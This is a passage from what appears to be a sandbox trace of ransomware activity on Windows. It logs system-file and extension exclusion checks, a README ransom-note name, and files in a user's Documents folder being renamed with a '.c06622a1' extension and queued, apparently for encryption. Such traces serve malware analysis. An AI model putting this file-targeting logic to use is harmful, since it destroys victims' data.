(HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0157.571] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0157.572] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x321b24a0, ftCreationTime.dwHighDateTime=0x1d5ac92, ftLastAccessTime.dwLowDateTime=0x8bd95420, ftLastAccessTime.dwHighDateTime=0x1d56d1e, ftLastWriteTime.dwLowDateTime=0x8bd95420, ftLastWriteTime.dwHighDateTime=0x1d56d1e, nFileSizeHigh=0x0, nFileSizeLow=0xcfad, dwReserved0=0x0, dwReserved1=0x0, cFileName="c3zqEM6.xlsx", cAlternateFileName="C3ZQEM~1.XLS")) returned 1 [0157.572] _wcsicmp (_Str1="c3zqEM6.xlsx", _Str2="README.c06622a1.TXT") returned -15 [0157.572] wcsstr (_Str="c3zqEM6.xlsx", _SubStr="README") returned 0x0 [0157.572] _wcsicmp (_Str1="autorun.inf", _Str2="c3zqEM6.xlsx") returned -2 [0157.572] wcslen (_String="autorun.inf") returned 0xb [0157.572] _wcsicmp (_Str1="boot.ini", _Str2="c3zqEM6.xlsx") returned -1 [0157.572] wcslen (_String="boot.ini") returned 0x8 [0157.572] _wcsicmp (_Str1="bootfont.bin", _Str2="c3zqEM6.xlsx") returned -1 [0157.572] wcslen (_String="bootfont.bin") returned 0xc [0157.572] _wcsicmp (_Str1="bootsect.bak", _Str2="c3zqEM6.xlsx") returned -1 [0157.572] wcslen (_String="bootsect.bak") returned 0xc [0157.572] _wcsicmp (_Str1="desktop.ini", _Str2="c3zqEM6.xlsx") returned 1 [0157.572] wcslen (_String="desktop.ini") returned 0xb [0157.572] _wcsicmp (_Str1="iconcache.db", _Str2="c3zqEM6.xlsx") returned 6 [0157.572] wcslen (_String="iconcache.db") returned 0xc [0157.572] _wcsicmp (_Str1="ntldr", _Str2="c3zqEM6.xlsx") returned 11 [0157.572] wcslen (_String="ntldr") returned 0x5 [0157.572] _wcsicmp (_Str1="ntuser.dat", _Str2="c3zqEM6.xlsx") returned 11 [0157.572] wcslen (_String="ntuser.dat") returned 0xa [0157.572] _wcsicmp (_Str1="ntuser.dat.log", _Str2="c3zqEM6.xlsx") returned 11 [0157.573] wcslen (_String="ntuser.dat.log") returned 0xe [0157.573] _wcsicmp (_Str1="ntuser.ini", _Str2="c3zqEM6.xlsx") returned 11 [0157.573] wcslen (_String="ntuser.ini") returned 0xa [0157.573] _wcsicmp (_Str1="thumbs.db", _Str2="c3zqEM6.xlsx") returned 17 [0157.573] wcslen (_String="thumbs.db") returned 0x9 [0157.573] _wcsicmp (_Str1="386", _Str2="xlsx") returned -69 [0157.573] wcslen (_String="386") returned 0x3 [0157.573] _wcsicmp (_Str1="adv", _Str2="xlsx") returned -23 [0157.573] wcslen (_String="adv") returned 0x3 [0157.573] _wcsicmp (_Str1="ani", _Str2="xlsx") returned -23 [0157.573] wcslen (_String="ani") returned 0x3 [0157.573] _wcsicmp (_Str1="bat", _Str2="xlsx") returned -22 [0157.573] wcslen (_String="bat") returned 0x3 [0157.573] _wcsicmp (_Str1="bin", _Str2="xlsx") returned -22 [0157.573] wcslen (_String="bin") returned 0x3 [0157.573] _wcsicmp (_Str1="cab", _Str2="xlsx") returned -21 [0157.573] wcslen (_String="cab") returned 0x3 [0157.573] _wcsicmp (_Str1="cmd", _Str2="xlsx") returned -21 [0157.573] wcslen (_String="cmd") returned 0x3 [0157.573] _wcsicmp (_Str1="com", _Str2="xlsx") returned -21 [0157.573] wcslen (_String="com") returned 0x3 [0157.573] _wcsicmp (_Str1="cpl", _Str2="xlsx") returned -21 [0157.573] wcslen (_String="cpl") returned 0x3 [0157.573] _wcsicmp (_Str1="cur", _Str2="xlsx") returned -21 [0157.573] wcslen (_String="cur") returned 0x3 [0157.573] _wcsicmp (_Str1="deskthemepack", _Str2="xlsx") returned -20 [0157.573] wcslen (_String="deskthemepack") returned 0xd [0157.573] _wcsicmp (_Str1="diagcab", _Str2="xlsx") returned -20 [0157.573] wcslen (_String="diagcab") returned 0x7 [0157.574] _wcsicmp (_Str1="diagcfg", _Str2="xlsx") returned -20 [0157.574] wcslen (_String="diagcfg") returned 0x7 [0157.574] _wcsicmp (_Str1="diagpkg", _Str2="xlsx") returned -20 [0157.574] wcslen (_String="diagpkg") returned 0x7 [0157.574] _wcsicmp (_Str1="dll", _Str2="xlsx") returned -20 [0157.574] wcslen (_String="dll") returned 0x3 [0157.574] _wcsicmp (_Str1="drv", _Str2="xlsx") returned -20 [0157.574] wcslen (_String="drv") returned 0x3 [0157.574] _wcsicmp (_Str1="exe", _Str2="xlsx") returned -19 [0157.574] wcslen (_String="exe") returned 0x3 [0157.574] _wcsicmp (_Str1="hlp", _Str2="xlsx") returned -16 [0157.574] wcslen (_String="hlp") returned 0x3 [0157.574] _wcsicmp (_Str1="icl", _Str2="xlsx") returned -15 [0157.574] wcslen (_String="icl") returned 0x3 [0157.574] _wcsicmp (_Str1="icns", _Str2="xlsx") returned -15 [0157.574] wcslen (_String="icns") returned 0x4 [0157.574] _wcsicmp (_Str1="ico", _Str2="xlsx") returned -15 [0157.574] wcslen (_String="ico") returned 0x3 [0157.574] _wcsicmp (_Str1="ics", _Str2="xlsx") returned -15 [0157.574] wcslen (_String="ics") returned 0x3 [0157.574] _wcsicmp (_Str1="idx", _Str2="xlsx") returned -15 [0157.574] wcslen (_String="idx") returned 0x3 [0157.574] _wcsicmp (_Str1="ldf", _Str2="xlsx") returned -12 [0157.574] wcslen (_String="ldf") returned 0x3 [0157.575] _wcsicmp (_Str1="lnk", _Str2="xlsx") returned -12 [0157.575] wcslen (_String="lnk") returned 0x3 [0157.575] _wcsicmp (_Str1="mod", _Str2="xlsx") returned -11 [0157.575] wcslen (_String="mod") returned 0x3 [0157.575] _wcsicmp (_Str1="mpa", _Str2="xlsx") returned -11 [0157.575] wcslen (_String="mpa") returned 0x3 [0157.575] _wcsicmp (_Str1="msc", _Str2="xlsx") returned -11 [0157.575] wcslen (_String="msc") returned 0x3 [0157.575] _wcsicmp (_Str1="msp", _Str2="xlsx") returned -11 [0157.575] wcslen (_String="msp") returned 0x3 [0157.575] _wcsicmp (_Str1="msstyles", _Str2="xlsx") returned -11 [0157.575] wcslen (_String="msstyles") returned 0x8 [0157.575] _wcsicmp (_Str1="msu", _Str2="xlsx") returned -11 [0157.575] wcslen (_String="msu") returned 0x3 [0157.575] _wcsicmp (_Str1="nls", _Str2="xlsx") returned -10 [0157.575] wcslen (_String="nls") returned 0x3 [0157.575] _wcsicmp (_Str1="nomedia", _Str2="xlsx") returned -10 [0157.575] wcslen (_String="nomedia") returned 0x7 [0157.575] _wcsicmp (_Str1="ocx", _Str2="xlsx") returned -9 [0157.575] wcslen (_String="ocx") returned 0x3 [0157.575] _wcsicmp (_Str1="prf", _Str2="xlsx") returned -8 [0157.575] wcslen (_String="prf") returned 0x3 [0157.575] _wcsicmp (_Str1="ps1", _Str2="xlsx") returned -8 [0157.575] wcslen (_String="ps1") returned 0x3 [0157.575] _wcsicmp (_Str1="rom", _Str2="xlsx") returned -6 [0157.576] wcslen (_String="rom") returned 0x3 [0157.576] _wcsicmp (_Str1="rtp", _Str2="xlsx") returned -6 [0157.576] wcslen (_String="rtp") returned 0x3 [0157.576] _wcsicmp (_Str1="scr", _Str2="xlsx") returned -5 [0157.576] wcslen (_String="scr") returned 0x3 [0157.576] _wcsicmp (_Str1="shs", _Str2="xlsx") returned -5 [0157.576] wcslen (_String="shs") returned 0x3 [0157.576] _wcsicmp (_Str1="spl", _Str2="xlsx") returned -5 [0157.576] wcslen (_String="spl") returned 0x3 [0157.576] _wcsicmp (_Str1="sys", _Str2="xlsx") returned -5 [0157.576] wcslen (_String="sys") returned 0x3 [0157.576] _wcsicmp (_Str1="theme", _Str2="xlsx") returned -4 [0157.576] wcslen (_String="theme") returned 0x5 [0157.576] _wcsicmp (_Str1="themepack", _Str2="xlsx") returned -4 [0157.576] wcslen (_String="themepack") returned 0x9 [0157.576] _wcsicmp (_Str1="wpx", _Str2="xlsx") returned -1 [0157.576] wcslen (_String="wpx") returned 0x3 [0157.576] _wcsicmp (_Str1="lock", _Str2="xlsx") returned -12 [0157.576] wcslen (_String="lock") returned 0x4 [0157.576] _wcsicmp (_Str1="key", _Str2="xlsx") returned -13 [0157.576] wcslen (_String="key") returned 0x3 [0157.576] _wcsicmp (_Str1="hta", _Str2="xlsx") returned -16 [0157.576] wcslen (_String="hta") returned 0x3 [0157.576] _wcsicmp (_Str1="msi", _Str2="xlsx") returned -11 [0157.576] wcslen (_String="msi") returned 0x3 [0157.576] _wcsicmp (_Str1="pdb", _Str2="xlsx") returned -8 [0157.576] wcslen (_String="pdb") returned 0x3 [0157.577] _wcsicmp (_Str1="sqlite", _Str2="xlsx") returned -5 [0157.577] wcslen (_String="sqlite") returned 0x6 [0157.577] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0157.577] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0157.577] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0157.577] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0157.577] wcscpy (in: _Dest=0x32100a0, _Source="c3zqEM6.xlsx" | out: _Dest="c3zqEM6.xlsx") returned="c3zqEM6.xlsx" [0157.577] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\c3zqEM6.xlsx", dwFileAttributes=0x80) returned 1 [0157.577] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\c3zqEM6.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c3zqem6.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0157.577] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.578] ReadFile (in: hFile=0x1c0, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0157.579] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x655e505b [0157.579] RtlComputeCrc32 (PartialCrc=0x505b, Buffer=0x32ec24, Length=0x80) returned 0x4c9ca74e [0157.579] RtlComputeCrc32 (PartialCrc=0xa74e, Buffer=0x32ec24, Length=0x80) returned 0xbb7fc515 [0157.579] RtlComputeCrc32 (PartialCrc=0xc515, Buffer=0x32ec24, Length=0x80) returned 0x9c696ce4 [0157.579] RtlComputeCrc32 (PartialCrc=0x6ce4, Buffer=0x32ec24, Length=0x80) returned 0x6cf87e1 [0157.579] CloseHandle (hObject=0x1c0) returned 1 [0157.579] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0157.579] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\c3zqEM6.xlsx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\c3zqEM6.xlsx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\c3zqEM6.xlsx" [0157.579] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\c3zqEM6.xlsx") returned 0x38 [0157.579] wcscpy (in: _Dest=0x32200c0, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0157.579] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\c3zqEM6.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c3zqem6.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\c3zqEM6.xlsx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c3zqem6.xlsx.c06622a1"), dwFlags=0x8) returned 1 [0157.585] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\c3zqEM6.xlsx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c3zqem6.xlsx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1c0 [0157.585] CreateIoCompletionPort (FileHandle=0x1c0, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0157.585] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2690020 [0157.594] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6ab741b7 [0157.594] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1a1c721f [0157.594] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5020c1b1 [0157.594] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1b70c551 [0157.594] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5e7eba9c [0157.594] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5023ca11 [0157.595] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x55243c71 [0157.595] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x30922a82 [0157.598] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2690094, Length=0x80) returned 0xd238df77 [0157.598] RtlComputeCrc32 (PartialCrc=0xdf77, Buffer=0x2690094, Length=0x80) returned 0x790f0142 [0157.598] RtlComputeCrc32 (PartialCrc=0x142, Buffer=0x2690094, Length=0x80) returned 0x70594d8c [0157.598] RtlComputeCrc32 (PartialCrc=0x4d8c, Buffer=0x2690094, Length=0x80) returned 0x226afa51 [0157.598] RtlComputeCrc32 (PartialCrc=0xfa51, Buffer=0x2690094, Length=0x80) returned 0xfbdd840 [0157.598] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0157.598] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0157.609] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0157.611] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa896b70, ftCreationTime.dwHighDateTime=0x1d5e326, ftLastAccessTime.dwLowDateTime=0x315f5840, ftLastAccessTime.dwHighDateTime=0x1d560ef, ftLastWriteTime.dwLowDateTime=0x315f5840, ftLastWriteTime.dwHighDateTime=0x1d560ef, nFileSizeHigh=0x0, nFileSizeLow=0x10a5d, dwReserved0=0x0, dwReserved1=0x0, cFileName="ccVEprlRmUDKtxp.xlsx", cAlternateFileName="CCVEPR~1.XLS")) returned 1 [0157.611] _wcsicmp (_Str1="ccVEprlRmUDKtxp.xlsx", _Str2="README.c06622a1.TXT") returned -15 [0157.611] wcsstr (_Str="ccVEprlRmUDKtxp.xlsx", _SubStr="README") returned 0x0 [0157.611] _wcsicmp (_Str1="autorun.inf", _Str2="ccVEprlRmUDKtxp.xlsx") returned -2 [0157.611] wcslen (_String="autorun.inf") returned 0xb [0157.611] _wcsicmp (_Str1="boot.ini", _Str2="ccVEprlRmUDKtxp.xlsx") returned -1 [0157.611] wcslen (_String="boot.ini") returned 0x8 [0157.611] _wcsicmp (_Str1="bootfont.bin", _Str2="ccVEprlRmUDKtxp.xlsx") returned -1 [0157.611] wcslen (_String="bootfont.bin") returned 0xc [0157.611] _wcsicmp (_Str1="bootsect.bak", _Str2="ccVEprlRmUDKtxp.xlsx") returned -1 [0157.611] wcslen (_String="bootsect.bak") returned 0xc [0157.611] _wcsicmp (_Str1="desktop.ini", _Str2="ccVEprlRmUDKtxp.xlsx") returned 1 [0157.611] wcslen (_String="desktop.ini") returned 0xb [0157.611] _wcsicmp (_Str1="iconcache.db", _Str2="ccVEprlRmUDKtxp.xlsx") returned 6 [0157.611] wcslen (_String="iconcache.db") returned 0xc [0157.611] _wcsicmp (_Str1="ntldr", _Str2="ccVEprlRmUDKtxp.xlsx") returned 11 [0157.611] wcslen (_String="ntldr") returned 0x5 [0157.611] _wcsicmp (_Str1="ntuser.dat", _Str2="ccVEprlRmUDKtxp.xlsx") returned 11 [0157.612] wcslen (_String="ntuser.dat") returned 0xa [0157.612] _wcsicmp (_Str1="ntuser.dat.log", _Str2="ccVEprlRmUDKtxp.xlsx") returned 11 [0157.612] wcslen (_String="ntuser.dat.log") returned 0xe [0157.612] _wcsicmp (_Str1="ntuser.ini", _Str2="ccVEprlRmUDKtxp.xlsx") returned 11 [0157.612] wcslen (_String="ntuser.ini") returned 0xa [0157.612] _wcsicmp (_Str1="thumbs.db", _Str2="ccVEprlRmUDKtxp.xlsx") returned 17 [0157.612] wcslen (_String="thumbs.db") returned 0x9 [0157.612] _wcsicmp (_Str1="386", _Str2="xlsx") returned -69 [0157.612] wcslen (_String="386") returned 0x3 [0157.612] _wcsicmp (_Str1="adv", _Str2="xlsx") returned -23 [0157.612] wcslen (_String="adv") returned 0x3 [0157.612] _wcsicmp (_Str1="ani", _Str2="xlsx") returned -23 [0157.612] wcslen (_String="ani") returned 0x3 [0157.612] _wcsicmp (_Str1="bat", _Str2="xlsx") returned -22 [0157.612] wcslen (_String="bat") returned 0x3 [0157.612] _wcsicmp (_Str1="bin", _Str2="xlsx") returned -22 [0157.612] wcslen (_String="bin") returned 0x3 [0157.612] _wcsicmp (_Str1="cab", _Str2="xlsx") returned -21 [0157.612] wcslen (_String="cab") returned 0x3 [0157.612] _wcsicmp (_Str1="cmd", _Str2="xlsx") returned -21 [0157.612] wcslen (_String="cmd") returned 0x3 [0157.612] _wcsicmp (_Str1="com", _Str2="xlsx") returned -21 [0157.612] wcslen (_String="com") returned 0x3 [0157.612] _wcsicmp (_Str1="cpl", _Str2="xlsx") returned -21 [0157.612] wcslen (_String="cpl") returned 0x3 [0157.612] _wcsicmp (_Str1="cur", _Str2="xlsx") returned -21 [0157.613] wcslen (_String="cur") returned 0x3 [0157.613] _wcsicmp (_Str1="deskthemepack", _Str2="xlsx") returned -20 [0157.613] wcslen (_String="deskthemepack") returned 0xd [0157.613] _wcsicmp (_Str1="diagcab", _Str2="xlsx") returned -20 [0157.613] wcslen (_String="diagcab") returned 0x7 [0157.613] _wcsicmp (_Str1="diagcfg", _Str2="xlsx") returned -20 [0157.613] wcslen (_String="diagcfg") returned 0x7 [0157.613] _wcsicmp (_Str1="diagpkg", _Str2="xlsx") returned -20 [0157.613] wcslen (_String="diagpkg") returned 0x7 [0157.613] _wcsicmp (_Str1="dll", _Str2="xlsx") returned -20 [0157.613] wcslen (_String="dll") returned 0x3 [0157.613] _wcsicmp (_Str1="drv", _Str2="xlsx") returned -20 [0157.613] wcslen (_String="drv") returned 0x3 [0157.613] _wcsicmp (_Str1="exe", _Str2="xlsx") returned -19 [0157.613] wcslen (_String="exe") returned 0x3 [0157.613] _wcsicmp (_Str1="hlp", _Str2="xlsx") returned -16 [0157.613] wcslen (_String="hlp") returned 0x3 [0157.613] _wcsicmp (_Str1="icl", _Str2="xlsx") returned -15 [0157.613] wcslen (_String="icl") returned 0x3 [0157.613] _wcsicmp (_Str1="icns", _Str2="xlsx") returned -15 [0157.613] wcslen (_String="icns") returned 0x4 [0157.613] _wcsicmp (_Str1="ico", _Str2="xlsx") returned -15 [0157.613] wcslen (_String="ico") returned 0x3 [0157.613] _wcsicmp (_Str1="ics", _Str2="xlsx") returned -15 [0157.613] wcslen (_String="ics") returned 0x3 [0157.613] _wcsicmp (_Str1="idx", _Str2="xlsx") returned -15 [0157.614] wcslen (_String="idx") returned 0x3 [0157.614] _wcsicmp (_Str1="ldf", _Str2="xlsx") returned -12 [0157.614] wcslen (_String="ldf") returned 0x3 [0157.614] _wcsicmp (_Str1="lnk", _Str2="xlsx") returned -12 [0157.614] wcslen (_String="lnk") returned 0x3 [0157.614] _wcsicmp (_Str1="mod", _Str2="xlsx") returned -11 [0157.614] wcslen (_String="mod") returned 0x3 [0157.614] _wcsicmp (_Str1="mpa", _Str2="xlsx") returned -11 [0157.614] wcslen (_String="mpa") returned 0x3 [0157.614] _wcsicmp (_Str1="msc", _Str2="xlsx") returned -11 [0157.614] wcslen (_String="msc") returned 0x3 [0157.614] _wcsicmp (_Str1="msp", _Str2="xlsx") returned -11 [0157.614] wcslen (_String="msp") returned 0x3 [0157.614] _wcsicmp (_Str1="msstyles", _Str2="xlsx") returned -11 [0157.614] wcslen (_String="msstyles") returned 0x8 [0157.614] _wcsicmp (_Str1="msu", _Str2="xlsx") returned -11 [0157.614] wcslen (_String="msu") returned 0x3 [0157.615] _wcsicmp (_Str1="nls", _Str2="xlsx") returned -10 [0157.615] wcslen (_String="nls") returned 0x3 [0157.615] _wcsicmp (_Str1="nomedia", _Str2="xlsx") returned -10 [0157.615] wcslen (_String="nomedia") returned 0x7 [0157.615] _wcsicmp (_Str1="ocx", _Str2="xlsx") returned -9 [0157.615] wcslen (_String="ocx") returned 0x3 [0157.615] _wcsicmp (_Str1="prf", _Str2="xlsx") returned -8 [0157.615] wcslen (_String="prf") returned 0x3 [0157.615] _wcsicmp (_Str1="ps1", _Str2="xlsx") returned -8 [0157.615] wcslen (_String="ps1") returned 0x3 [0157.615] _wcsicmp (_Str1="rom", _Str2="xlsx") returned -6 [0157.615] wcslen (_String="rom") returned 0x3 [0157.615] _wcsicmp (_Str1="rtp", _Str2="xlsx") returned -6 [0157.615] wcslen (_String="rtp") returned 0x3 [0157.615] _wcsicmp (_Str1="scr", _Str2="xlsx") returned -5 [0157.615] wcslen (_String="scr") returned 0x3 [0157.615] _wcsicmp (_Str1="shs", _Str2="xlsx") returned -5 [0157.615] wcslen (_String="shs") returned 0x3 [0157.615] _wcsicmp (_Str1="spl", _Str2="xlsx") returned -5 [0157.615] wcslen (_String="spl") returned 0x3 [0157.616] _wcsicmp (_Str1="sys", _Str2="xlsx") returned -5 [0157.616] wcslen (_String="sys") returned 0x3 [0157.616] _wcsicmp (_Str1="theme", _Str2="xlsx") returned -4 [0157.616] wcslen (_String="theme") returned 0x5 [0157.616] _wcsicmp (_Str1="themepack", _Str2="xlsx") returned -4 [0157.616] wcslen (_String="themepack") returned 0x9 [0157.616] _wcsicmp (_Str1="wpx", _Str2="xlsx") returned -1 [0157.616] wcslen (_String="wpx") returned 0x3 [0157.616] _wcsicmp (_Str1="lock", _Str2="xlsx") returned -12 [0157.616] wcslen (_String="lock") returned 0x4 [0157.616] _wcsicmp (_Str1="key", _Str2="xlsx") returned -13 [0157.616] wcslen (_String="key") returned 0x3 [0157.616] _wcsicmp (_Str1="hta", _Str2="xlsx") returned -16 [0157.616] wcslen (_String="hta") returned 0x3 [0157.616] _wcsicmp (_Str1="msi", _Str2="xlsx") returned -11 [0157.616] wcslen (_String="msi") returned 0x3 [0157.617] _wcsicmp (_Str1="pdb", _Str2="xlsx") returned -8 [0157.617] wcslen (_String="pdb") returned 0x3 [0157.617] _wcsicmp (_Str1="sqlite", _Str2="xlsx") returned -5 [0157.617] wcslen (_String="sqlite") returned 0x6 [0157.617] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0157.617] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0157.617] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0157.617] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0157.617] wcscpy (in: _Dest=0x32100a0, _Source="ccVEprlRmUDKtxp.xlsx" | out: _Dest="ccVEprlRmUDKtxp.xlsx") returned="ccVEprlRmUDKtxp.xlsx" [0157.617] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ccVEprlRmUDKtxp.xlsx", dwFileAttributes=0x80) returned 1 [0157.618] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ccVEprlRmUDKtxp.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ccveprlrmudktxp.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0157.618] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.618] ReadFile (in: hFile=0x198, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0157.619] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0xcac7b25e [0157.619] RtlComputeCrc32 (PartialCrc=0xb25e, Buffer=0x32ec24, Length=0x80) returned 0xdcf7b173 [0157.619] RtlComputeCrc32 (PartialCrc=0xb173, Buffer=0x32ec24, Length=0x80) returned 0x970e8466 [0157.619] RtlComputeCrc32 (PartialCrc=0x8466, Buffer=0x32ec24, Length=0x80) returned 0x4aea7f0e [0157.619] RtlComputeCrc32 (PartialCrc=0x7f0e, Buffer=0x32ec24, Length=0x80) returned 0xb1e05e7f [0157.619] CloseHandle (hObject=0x198) returned 1 [0157.619] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0157.619] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ccVEprlRmUDKtxp.xlsx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ccVEprlRmUDKtxp.xlsx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ccVEprlRmUDKtxp.xlsx" [0157.619] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ccVEprlRmUDKtxp.xlsx") returned 0x40 [0157.619] wcscpy (in: _Dest=0x32200d0, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0157.619] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ccVEprlRmUDKtxp.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ccveprlrmudktxp.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ccVEprlRmUDKtxp.xlsx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ccveprlrmudktxp.xlsx.c06622a1"), dwFlags=0x8) returned 1 [0157.622] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ccVEprlRmUDKtxp.xlsx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ccveprlrmudktxp.xlsx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x198 [0157.622] CreateIoCompletionPort (FileHandle=0x198, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0157.622] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2b70020 [0157.630] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1b2490e5 [0157.630] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x26fad24f [0157.630] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5db26146 [0157.630] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 